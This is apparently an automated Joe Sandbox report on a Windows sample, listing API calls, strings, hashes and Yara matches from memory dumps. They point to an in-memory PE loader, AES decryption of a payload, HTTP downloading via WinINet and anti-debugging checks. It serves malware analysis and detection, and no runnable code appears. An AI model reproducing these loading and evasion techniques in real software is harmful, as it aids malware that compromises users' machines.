                                                    • Opcode ID: a1823d19331d18030d6623ceafdda54353c8aa9a731fe85ef26cec03d1ceb6f5
                                                    • Instruction ID: cc7902f8ca993a0660af816d95d23b9f0ed0e4be7282d2770bc9f66b61f2e58e
                                                    • Opcode Fuzzy Hash: a1823d19331d18030d6623ceafdda54353c8aa9a731fe85ef26cec03d1ceb6f5
                                                    • Instruction Fuzzy Hash: CA012BF610820AEEE7018F1589405BFB7F5FBC6720B318126FA01D2D85D3A95D108B2C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1350 704356-704361 1351 704363-704374 1350->1351 1352 704375-704386 1350->1352 1351->1352 1354 704392-7043e0 VirtualProtect call 7043e3 1352->1354 1355 70438c 1352->1355 1355->1354
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,4D4005D1), ref: 007043B9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.0000000000703000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00703000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_703000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 6f66ec4fcc454e18d7f3b8b9838f5f1c71779e409f16433812086a9312eecaf4
                                                    • Instruction ID: 534a636ddbc21e50c980c367b60ac9b62c592d05432eafee9da84b0058f67014
                                                    • Opcode Fuzzy Hash: 6f66ec4fcc454e18d7f3b8b9838f5f1c71779e409f16433812086a9312eecaf4
                                                    • Instruction Fuzzy Hash: 9AF0F9BA608209EEE710CF2589445BEF7E6FB86730B348229EA4196995D3795C118728

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1359 5fa42f-5fe18b LoadLibraryA
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmp, Offset: 005F5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_5f5000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 01d3c681ae26dd7e11b531909cee3ec78fbd0e95219319d727f33e30a5df65f7
                                                    • Instruction ID: bf46d3116f61dd3dee418a467c21af6ae37bbd9a2bad71a5c5e9bdb1a1570f05
                                                    • Opcode Fuzzy Hash: 01d3c681ae26dd7e11b531909cee3ec78fbd0e95219319d727f33e30a5df65f7
                                                    • Instruction Fuzzy Hash: D5014BB200C608CFD300AF25D98523AFBE5FB94710F218D2DA6C687604E6395941AA53

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1367 70436b-704386 1370 704392-7043e0 VirtualProtect call 7043e3 1367->1370 1371 70438c 1367->1371 1371->1370
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,4D4005D1), ref: 007043B9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.0000000000703000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00703000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_703000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 519f1949ff590810297daea1c2e8be638f5a1b0f5d397241bafb4c433baf2cb7
                                                    • Instruction ID: c7f471cebf2ebf163e1ca9d065f8f4d518e0923334ee9a2112649f89a4fb0e11
                                                    • Opcode Fuzzy Hash: 519f1949ff590810297daea1c2e8be638f5a1b0f5d397241bafb4c433baf2cb7
                                                    • Instruction Fuzzy Hash: F0F0F6BB608109EEE7008F15D9449FFB7F5EBC9320B308129FA01D2945D2B95C118B28

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1375 70439f-7043a5 1376 7043a7-7043e0 VirtualProtect call 7043e3 1375->1376 1377 7043ea-7043f2 1375->1377
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,4D4005D1), ref: 007043B9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.0000000000703000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00703000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_703000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 712bd85eee7616a3385f8e77614b34268489b64bcac086c2af7da089091db0ef
                                                    • Instruction ID: 6b0b5cdd65c0d28356e49778dfb1c00c25a37b1e40599f8bfb20d5c65af4340e
                                                    • Opcode Fuzzy Hash: 712bd85eee7616a3385f8e77614b34268489b64bcac086c2af7da089091db0ef
                                                    • Instruction Fuzzy Hash: 3CF05CB520524E8FD7004F2488405EE7FB1DFC6A40B258164D9808799AC234DC11D754

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1382 5fa889-5fe18b LoadLibraryA
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmp, Offset: 005F5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_5f5000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 29342b8e9f5bae063fb0fc0f5acc7431c0f3f1b6035080090bdadbe3e08da110
                                                    • Instruction ID: a8dc7563abeb8b1f9f6ebdbebbf000976a8a17da8d70e757f2f01d38b192a1f2
                                                    • Opcode Fuzzy Hash: 29342b8e9f5bae063fb0fc0f5acc7431c0f3f1b6035080090bdadbe3e08da110
                                                    • Instruction Fuzzy Hash: 08F01CB140D609DFD304AF66958443ABFE5FBA4710F31CC2DA2CA86614E6394841AA53
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmp, Offset: 005F5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_5f5000_607f096cd3.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 908a05b25c6ac10b0cdb718a856d1e668427d96be501c4254be33843e4cc2fe6
                                                    • Instruction ID: fee59c55c31f27fb6516cd45549f4ae1232364643a1c2c360952096eb8a39157
                                                    • Opcode Fuzzy Hash: 908a05b25c6ac10b0cdb718a856d1e668427d96be501c4254be33843e4cc2fe6
                                                    • Instruction Fuzzy Hash: A6F065B240D609DFD304AF55858543EBBF5FBB4710F31CC2DA28A46104E6358D52AA63
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 047A8174
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675534930.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: b7ee4685b3560880c722a87af921d37dd854d14b97f1e34b5c59a131e3db5e88
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: B5113C79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DF81
                                                    APIs
                                                    • SetLastError.KERNEL32(0000000D), ref: 00402F02
                                                    • SetLastError.KERNEL32(000000C1), ref: 00402F44
                                                    Strings
                                                    • Size is not valid!, xrefs: 00402F08
                                                    • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                                                    • ERROR_OUTOFMEMORY!, xrefs: 00403062
                                                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                                                    • DOS header is not valid!, xrefs: 00402F32
                                                    • DOS header size is not valid!, xrefs: 00402F71
                                                    • Section alignment invalid!, xrefs: 00402FC7
                                                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                    • API String ID: 1452528299-2436911586
                                                    • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                                                    • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                                                    • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                                                    • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                                                    APIs
                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049538B7
                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049538DB
                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04953945
                                                    • GetLastError.KERNEL32 ref: 0495394F
                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04953977
                                                    • GetLastError.KERNEL32 ref: 04953981
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04953991
                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04953A53
                                                    • CryptDestroyKey.ADVAPI32(?), ref: 04953AC5
                                                    Strings
                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04953893
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                    • API String ID: 3761881897-63410773
                                                    • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                                                    • Instruction ID: 59e7dc52144a8d82591a686373c6de8e293fa5690d896e85b7fa2fa1b2dd26a3
                                                    • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                                                    • Instruction Fuzzy Hash: FD816171A002189FEB24DF24CC45B9ABBB5EF45340F1481B9E94DE72A1DB31AE858F51
                                                    APIs
                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,F7F2B484), ref: 00403650
                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                                                    • GetLastError.KERNEL32 ref: 004036E8
                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                                                    • GetLastError.KERNEL32 ref: 0040371A
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                                                    • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                                                    Strings
                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                    • API String ID: 3761881897-63410773
                                                    • Opcode ID: 9157ddbdae611f76920f8f0e2b61dba520c3b44a460a9e67b31739eb10044fb6
                                                    • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                                                    • Opcode Fuzzy Hash: 9157ddbdae611f76920f8f0e2b61dba520c3b44a460a9e67b31739eb10044fb6
                                                    • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                                                    APIs
                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                                                    • LocalFree.KERNEL32(00000000), ref: 00402B62
                                                    • LocalFree.KERNEL32(?), ref: 00402B67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                    • String ID: %s: %s$Error protecting memory page
                                                    • API String ID: 839691724-1484484497
                                                    • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                                                    • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                                                    • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                                                    • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                                                    APIs
                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileInternet$PointerRead
                                                    • String ID: text
                                                    • API String ID: 3197321146-999008199
                                                    • Opcode ID: e58448fb09f7632ce881cdde87c2d7f0d41e371cbdf98eec557d76fba518bc4e
                                                    • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                                                    • Opcode Fuzzy Hash: e58448fb09f7632ce881cdde87c2d7f0d41e371cbdf98eec557d76fba518bc4e
                                                    • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                    • Instruction ID: 5870f6e88b346de3dd458830fb0bab3246a4d891899ac372411a492dd1262dbd
                                                    • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                    • Instruction Fuzzy Hash: B9022D71E012199FDF14CFA8D9D0AAEBBB5FF48314F248269D91AEB340D731A941CB90
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                    • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                                                    • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                    • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0495A7FD
                                                    • IsDebuggerPresent.KERNEL32 ref: 0495A8C9
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0495A8E9
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0495A8F3
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                    • Instruction ID: d80dbb66706cfd000b64b7993774e351344232ebf29181e0be46c47f672497d0
                                                    • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                    • Instruction Fuzzy Hash: 9931E975D0521DDBDB10DFA4D9497CCBBB8BF08304F2041AAE509A7250EB715A858F49
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                                                    • IsDebuggerPresent.KERNEL32 ref: 0040A662
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                    • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                                                    • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                    • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04952AA0), ref: 0495D142
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04952AA0), ref: 0495D14C
                                                    • UnhandledExceptionFilter.KERNEL32(0495277A,?,?,?,?,?,04952AA0), ref: 0495D159
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                                    • Instruction ID: c2750cbfe8e65d27d420d393e087f44d5dc05252f40ce80360e105cbb7549b49
                                                    • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                                    • Instruction Fuzzy Hash: 1C31CA749012289BCB21DF64DC897CCB7B8BF48310F6081EAE80CA7260E7709F858F44
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                                                    • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                                                    • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                                                    • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                    • Instruction ID: 6ce3d29f1addcd5865124b50645f19d2d3168d78503cf37b07ed9f9ec5b030e6
                                                    • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                    • Instruction Fuzzy Hash: 05419875804219AFDF20DFA9CC88AEABBBDEF45304F5442E9E41DD3210D634AE458F50
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                    • Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
                                                    • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                    • Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0495A30B), ref: 0495A98C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                    • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                                                    • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                    • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                                                    • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                                                    • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                                                    • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                                                    • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                                                    • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                                                    • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                                                    Strings
                                                    • WakeAllConditionVariable, xrefs: 00409C1D
                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                                                    • SleepConditionVariableCS, xrefs: 00409C11
                                                    • kernel32.dll, xrefs: 00409C00
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 2565136772-3242537097
                                                    • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                    • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                                                    • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                    • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                                                    APIs
                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                                                      • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
